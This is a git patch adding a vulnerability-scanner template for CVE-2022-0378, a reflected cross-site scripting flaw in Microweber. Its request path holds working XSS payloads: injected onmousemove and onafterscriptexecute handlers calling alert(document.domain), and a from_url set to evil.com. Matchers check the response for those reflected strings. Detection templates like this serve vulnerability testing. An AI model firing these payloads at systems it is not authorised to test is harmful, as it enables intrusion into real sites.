From 4f8a0ac62cc2f892e70eeeeb0fd9b89e29684713 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 6 Feb 2022 00:41:20 -0500 Subject: [PATCH] Create CVE-2022-0378.yaml --- cves/2022/CVE-2022-0378.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2022/CVE-2022-0378.yaml diff --git a/cves/2022/CVE-2022-0378.yaml b/cves/2022/CVE-2022-0378.yaml new file mode 100644 index 0000000000..e6dc5c1374 --- /dev/null +++ b/cves/2022/CVE-2022-0378.yaml @@ -0,0 +1,29 @@ +id: CVE-2022-0378 + +info: + name: Microweber XSS + author: pikpikcu + severity: medium + description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 + tags: cve,cve2022,microweber,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=zaasdasdasd"+onmousemove%3dalert(document.domain)+cc="asd&data-show-ui=admin&class=a%27+onafterscriptexecute%3dalert(document.domain)+c%20%3d%27aa&from_url=https://evil.com' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'from_url="https://evil.com"' + - 'onafterscriptexecute=alert(document.domain)' + - 'onmousemove="alert(document.domain)' + condition: and